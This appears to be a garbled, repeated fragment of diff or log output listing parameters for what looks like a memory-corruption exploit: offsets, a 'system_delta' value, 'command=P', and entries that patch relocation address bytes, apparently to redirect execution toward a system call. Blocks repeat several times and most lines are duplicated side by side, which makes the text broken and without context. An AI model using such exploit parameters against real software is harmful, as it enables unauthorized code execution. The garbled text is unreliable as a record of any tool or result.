off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3


@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3